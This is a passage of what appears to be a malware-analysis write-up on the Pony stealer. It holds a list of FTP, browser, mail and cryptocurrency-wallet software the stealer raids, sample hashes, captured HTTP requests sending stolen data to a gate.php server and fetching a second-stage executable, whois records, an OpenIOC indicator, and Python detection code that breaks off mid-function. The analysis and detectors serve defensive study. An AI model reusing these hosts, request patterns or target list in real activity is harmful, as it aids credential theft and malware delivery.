<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NETFile</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Devcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ExpanDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">GoFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Frankocoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ClassicFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3D-FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ProtoShares</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fling</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Easy FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MegaCoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SoftX</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Xftp</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Quarkcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Directory Opus</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Now</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Worldcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FreeFTP / DirectFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Robo-FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Infinitecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LeapFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LinasFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ixcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinSCP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Cyberduck</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Anoncoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">32bit FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Putty</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BBQcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NetDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Notepad++</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Digitalcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WebDrive</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoffeeCup Visual Site Designer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Mincoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Control</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPShell</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Goldcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Opera</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPInfo</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Yacoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WiseFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NexusFile</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Zetacoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Voyager</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FastStone Browser</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fastcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Firefox</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoolNovo</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">I0coin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FireFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinZip</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Tagcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SeaMonkey</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Yandex.Internet / Ya.Browser</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bytecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Flock</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MyFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Florincoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Mozilla</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">sherrod FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Phoenixcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">LeechFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NovaFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Luckycoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Odin Secure FTP Expert</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Windows Mail</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Craftcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WinFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Windows Live Mail</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Junkcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Surfer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Becky!</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><br /></td>
</tr>
</tbody>
</table>
</div>
It copies itself into the system using an integer filename, which is then executed through a chain of ShellExecuteEx calls.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth3.png" /></div>
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 98px;"></col>
<col style="width: 706px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE NAME</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">31780534.exe</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE SIZE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">317440 bytes</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE TYPE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MD5</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2bd7a3cc81ae70b16b2a85008fb7dd81</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA1</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">7bf35f051a44dc31f0b138e1874e1d75745d49b3</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA256</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CRC32</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">4AA8F5BD</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SSDEEP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">YARA</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">None matched</span></td>
</tr>
</tbody>
</table>
</div>
Not only does Pony steal information, but it also downloads other malware from locations that are hardcoded in the binary itself.<br />
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 328px;"></col>
<col style="width: 474px;"></col></colgroup>
<tbody valign="top">
<tr>
<td colspan="2" style="border: 0.5pt solid; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">http://titratresfi.ru/gate.php</span></td>
<td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">POST /gate.php HTTP/1.0<br />
</span><span style="font-size: 10pt;">Host: titratresfi.ru<br />
</span><span style="font-size: 10pt;">Accept: */*<br />
</span><span style="font-size: 10pt;">Accept-Encoding: identity, *;q=0<br />
</span>
<span style="font-size: 10pt;">Accept-Language: en-US<br />
</span><br />
<span style="font-size: 10pt;">Content-Length: 270<br />
</span><br />
<span style="font-size: 10pt;">Content-Type: application/octet-stream<br />
</span><br />
<span style="font-size: 10pt;">Connection: close<br />
</span><br />
<span style="font-size: 10pt;">Content-Encoding: binary<br />
</span><br />
<span style="font-size: 10pt;">User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR
3.0.04506.648; .NET CLR 3.5.21022)<br />
</span></td>
</tr>
<tr>
<td colspan="2" style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; padding-left: 9px; padding-right: 9px; text-align: left;"><span style="font-size: 10pt;">http://adishma.com/media/system/shost.exe</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">GET /media/system/shost.exe HTTP/1.0<br />
</span>
<div style="text-align: left;">
<span style="font-size: 10pt;">Host: adishma.com<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept-Language: en-US<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept: */*<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Accept-Encoding: identity, *;q=0<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">Connection: close<br />
</span></div>
<div style="text-align: left;">
<span style="font-size: 10pt;">User-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET
CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)</span></div>
</td>
</tr>
</tbody>
</table>
</div>
Now let’s look at the network traffic it has generated.<br />
It sends basic information to the command and control server, which we will examine in depth in the second post.<br />
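The two requests in the table above share a recognisable shape: an HTTP/1.0 POST to gate.php carrying an application/octet-stream body with the non-standard Content-Encoding: binary, and a download of an .exe by the same hand-rolled client profile (an MSIE 6 User-Agent combined with Accept-Encoding: identity, *;q=0). The following is an added example, not code from the original post, that encodes those traits as a detection over request records; the HttpRequest class, the constructed sample set (the two captured requests plus two benign ones that must not fire) and the rule names are assumptions made for the demo.

```python
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    """Minimal request record; an assumed shape, not a Packetbeat or proxy schema."""
    method: str
    host: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)


PONY_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; "
           ".NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)")
MODERN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"

# Constructed sample traffic: the two requests from the capture above plus two
# benign requests from a current browser.
SAMPLE_REQUESTS = [
    HttpRequest("POST", "titratresfi.ru", "/gate.php", "HTTP/1.0", {
        "Accept": "*/*", "Accept-Encoding": "identity, *;q=0",
        "Content-Length": "270", "Content-Type": "application/octet-stream",
        "Content-Encoding": "binary", "Connection": "close", "User-Agent": PONY_UA}),
    HttpRequest("GET", "adishma.com", "/media/system/shost.exe", "HTTP/1.0", {
        "Accept": "*/*", "Accept-Encoding": "identity, *;q=0",
        "Connection": "close", "User-Agent": PONY_UA}),
    HttpRequest("GET", "example.org", "/index.html", "HTTP/1.1", {
        "Accept": "text/html", "Accept-Encoding": "gzip, deflate", "User-Agent": MODERN_UA}),
    HttpRequest("POST", "example.org", "/api/upload", "HTTP/1.1", {
        "Content-Type": "application/octet-stream", "Content-Length": "1024",
        "User-Agent": MODERN_UA}),
]


def _lower(headers):
    """Header names are case-insensitive; normalise before matching."""
    return {k.lower(): v for k, v in headers.items()}


def is_legacy_client(headers):
    """The hand-rolled client profile from the capture: an MSIE 6 User-Agent
    together with 'Accept-Encoding: identity, *;q=0', which real browsers do
    not send."""
    ua = headers.get("user-agent", "")
    return "MSIE 6.0" in ua and headers.get("accept-encoding", "").startswith("identity")


def classify(req):
    """Return the reasons a request matches the Pony traffic pattern ([] if none)."""
    h = _lower(req.headers)
    reasons = []
    # Check-in: 'binary' is not a registered HTTP content-coding, so a POST
    # that declares it (with an octet-stream body, over HTTP/1.0) is a strong signal.
    if (req.method == "POST" and req.version == "HTTP/1.0"
            and req.path.endswith("/gate.php")
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        reasons.append("pony-checkin")
    # Payload fetch: an executable pulled by the same legacy client profile.
    if req.method == "GET" and req.path.lower().endswith(".exe") and is_legacy_client(h):
        reasons.append("legacy-client-exe-download")
    return reasons


def scan(requests):
    """Map 'host/path' to its reasons for every request that matched."""
    hits = {}
    for req in requests:
        reasons = classify(req)
        if reasons:
            hits[req.host + req.path] = reasons
    return hits


if __name__ == "__main__":
    for url, why in scan(SAMPLE_REQUESTS).items():
        print(url, why)
```

Treat the check-in rule as high-confidence and the download rule as a hunting lead: genuinely old clients still exist, so the second rule is better used to pivot from a confirmed check-in than on its own.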
Network information<br />
domain: TITRATRESFI.RU<br />
nserver: ns1.entrydns.net.<br />
nserver: ns2.entrydns.net.<br />
state: REGISTERED, DELEGATED, VERIFIED<br />
person: Private Person<br />
registrar: R01-RU<br />
admin-contact: https://partner.r01.ru/contact_admin.khtml<br />
created: 2015.11.09<br />
paid-till: 2016.11.09<br />
free-date: 2016.12.10<br />
source: TCI<br />
Last updated on 2015.11.15 16:16:33 MSK<br />
Domain Name: ADISHMA.COM<br />
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />
Sponsoring Registrar IANA ID: 303<br />
Whois Server: whois.PublicDomainRegistry.com<br />
Referral URL: http://www.PublicDomainRegistry.com<br />
Name Server: NS1.SOFTONETECHNOLOGIES.COM<br />
Name Server: NS2.SOFTONETECHNOLOGIES.COM<br />
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited<br />
Updated Date: 07-sep-2015<br />
Creation Date: 26-dec-2014<br />
Expiration Date: 26-dec-2015<br />
IOC<br />
<Indicator id="aae1b2d0-a5ad-471a-8c48-2296f6cfb49e" operator="OR"><br />
<IndicatorItem condition="is" id="b1984833-80fe-446b-a3d8-3349822f6336"><br />
<Context document="FileItem" search="FileItem/Md5sum" type="mir"/><br />
<Content type="md5">6245899b11a6bd6769b3656943322d13</Content><br />
</IndicatorItem><br />
<IndicatorItem condition="is" id="e2168e97-5db8-4432-b498-8a5973deeb42"><br />
<Context document="FileItem" search="FileItem/Sha1sum" type="mir"/><br />
<Content type="sha1">9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content><br />
</IndicatorItem><br />
<IndicatorItem condition="is" id="f66fb3f0-1178-4638-bf06-24d131cfd2c7"><br />
<Context document="FileItem" search="FileItem/Sha256sum" type="mir"/><br />
<Content type="sha256">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content><br />
</IndicatorItem><br />
<Indicator id="81c75ab7-69b2-434d-808f-607a5b283cec" operator="AND"><br />
<IndicatorItem condition="is" id="bb45ed4b-823c-41d0-8831-0ab41c874a7f"><br />
<Context document="FileItem" search="FileItem/FileName" type="mir"/><br />
<Content type="string">Centrylink</Content><br />
</IndicatorItem><br />
<IndicatorItem condition="is" id="9194b695-6af4-428f-b2cf-3a40c2560e78"><br />
<Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/><br />
<Content type="int">209408</Content><br />
</IndicatorItem><br />
<IndicatorItem condition="is" id="010608b2-0016-426d-9dce-2e9ad855f786"><br />
<Context document="FileItem" search="FileItem/PEInfo/PETimeStamp" type="mir"/><br />
<Content type="date">2015-11-12T09:49:00Z</Content><br />
</IndicatorItem><br />
</Indicator><br />
</Indicator><br />
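The OpenIOC above can be evaluated mechanically: the outer Indicator is an OR over three hash items and a nested AND over file name, size and PE timestamp, so a repacked sample with a new hash still matches the AND branch. Below is an added example, not part of the original post, that parses the indicator with the standard library and applies that logic to file records. The record keys mirror the search attributes of the IOC, the records themselves are constructed, and the embedded copy of the indicator closes the outer Indicator element explicitly; the evaluator supports only the "is" and "contains" conditions, an assumption that covers this IOC.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

# The indicator from the write-up (same ids, hashes and values), with the
# outer <Indicator> element closed.
PONY_IOC = """<Indicator id="aae1b2d0-a5ad-471a-8c48-2296f6cfb49e" operator="OR">
  <IndicatorItem condition="is" id="b1984833-80fe-446b-a3d8-3349822f6336">
    <Context document="FileItem" search="FileItem/Md5sum" type="mir"/>
    <Content type="md5">6245899b11a6bd6769b3656943322d13</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="e2168e97-5db8-4432-b498-8a5973deeb42">
    <Context document="FileItem" search="FileItem/Sha1sum" type="mir"/>
    <Content type="sha1">9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="f66fb3f0-1178-4638-bf06-24d131cfd2c7">
    <Context document="FileItem" search="FileItem/Sha256sum" type="mir"/>
    <Content type="sha256">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
  </IndicatorItem>
  <Indicator id="81c75ab7-69b2-434d-808f-607a5b283cec" operator="AND">
    <IndicatorItem condition="is" id="bb45ed4b-823c-41d0-8831-0ab41c874a7f">
      <Context document="FileItem" search="FileItem/FileName" type="mir"/>
      <Content type="string">Centrylink</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="9194b695-6af4-428f-b2cf-3a40c2560e78">
      <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/>
      <Content type="int">209408</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="010608b2-0016-426d-9dce-2e9ad855f786">
      <Context document="FileItem" search="FileItem/PEInfo/PETimeStamp" type="mir"/>
      <Content type="date">2015-11-12T09:49:00Z</Content>
    </IndicatorItem>
  </Indicator>
</Indicator>"""

# Constructed host records keyed by the IOC's search paths: a hash match,
# a repacked copy (new hash, same name/size/timestamp) and a benign file.
SAMPLE_FILES = [
    {"FileItem/FileName": "shost.exe", "FileItem/SizeInBytes": 209408,
     "FileItem/Md5sum": "6245899B11A6BD6769B3656943322D13",
     "FileItem/PEInfo/PETimeStamp": "2015-11-12T09:49:00Z"},
    {"FileItem/FileName": "centrylink", "FileItem/SizeInBytes": 209408,
     "FileItem/Md5sum": "0f343b0931126a20f133d67c2b018a3b",
     "FileItem/PEInfo/PETimeStamp": "2015-11-12T09:49:00Z"},
    {"FileItem/FileName": "notepad.exe", "FileItem/SizeInBytes": 209408,
     "FileItem/Md5sum": "0f343b0931126a20f133d67c2b018a3b",
     "FileItem/PEInfo/PETimeStamp": "2015-11-12T09:49:00Z"},
]


def _coerce(value, content_type):
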